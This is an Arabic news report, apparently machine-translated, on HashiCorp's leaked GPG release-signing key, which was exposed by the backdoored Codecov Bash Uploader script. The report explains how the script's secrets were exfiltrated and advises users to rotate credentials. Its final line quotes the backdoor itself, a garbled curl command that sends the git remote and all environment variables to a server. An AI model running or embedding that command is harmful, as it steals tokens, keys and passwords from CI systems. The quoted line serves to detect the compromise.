أعلنت شركة HashiCorp، المعروفة بتطوير الأدوات مفتوحة المصدر Vagrant وPacker وNomad وTerraform، عن تسرب مفتاح GPG الخاص المستخدم لإنشاء التوقيعات الرقمية التي تتحقق من الإصدارات. من المحتمل أن يقوم المهاجمون الذين تمكنوا من الوصول إلى مفتاح GPG بإجراء تغييرات مخفية على منتجات HashiCorp من خلال التحقق منها باستخدام التوقيع الرقمي الصحيح. وفي الوقت نفسه، ذكرت الشركة أنه خلال التدقيق لم يتم العثور على أي أثر لمحاولات إجراء مثل هذه التعديلات.
حاليًا، تم إبطال مفتاح GPG المخترق وتم تقديم مفتاح جديد مكانه. أثرت المشكلة فقط على التحقق باستخدام ملفات SHA256SUM وSHA256SUM.sig، ولم تؤثر على إنشاء التوقيعات الرقمية لحزم Linux DEB وRPM المتوفرة من خلال Releases.hashicorp.com، بالإضافة إلى آليات التحقق من الإصدار لنظامي macOS وWindows (AuthentiCode). .
حدث التسرب بسبب استخدام البرنامج النصي Codecov Bash Uploader (codecov-bash) في البنية التحتية، المصمم لتنزيل تقارير التغطية من أنظمة التكامل المستمر. أثناء الهجوم على شركة Codecov، تم إخفاء باب خلفي في البرنامج النصي المحدد، والذي تم من خلاله إرسال كلمات المرور ومفاتيح التشفير إلى خادم المهاجمين.
للاختراق، استغل المهاجمون خطأً في عملية إنشاء صورة Codecov Docker، مما سمح لهم باستخراج بيانات الوصول إلى GCS (Google Cloud Storage)، اللازمة لإجراء تغييرات على البرنامج النصي Bash Uploader الموزع من codecov.io موقع إلكتروني. تم إجراء التغييرات مرة أخرى في 31 يناير، وظلت غير مكتشفة لمدة شهرين وسمحت للمهاجمين باستخراج المعلومات المخزنة في بيئات نظام التكامل المستمر للعملاء. باستخدام التعليمات البرمجية الضارة المضافة، يمكن للمهاجمين الحصول على معلومات حول مستودع Git الذي تم اختباره وجميع متغيرات البيئة، بما في ذلك الرموز المميزة ومفاتيح التشفير وكلمات المرور المنقولة إلى أنظمة التكامل المستمر لتنظيم الوصول إلى رمز التطبيق والمستودعات والخدمات مثل Amazon Web Services وGitHub.
بالإضافة إلى الاتصال المباشر، تم استخدام البرنامج النصي Codecov Bash Uploader كجزء من برامج التحميل الأخرى، مثل Codecov-action (Github)، وCodecov-circleci-orb، وCodecov-bitrise-step، والتي يتأثر مستخدموها أيضًا بالمشكلة. يُنصح جميع مستخدمي codecov-bash والمنتجات ذات الصلة بمراجعة البنية التحتية الخاصة بهم، بالإضافة إلى تغيير كلمات المرور ومفاتيح التشفير. يمكنك التحقق من وجود باب خلفي في البرنامج النصي من خلال وجود السطر cur -sm 0.5 -d “$(git Remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || حقيقي
المصدر: opennet.ru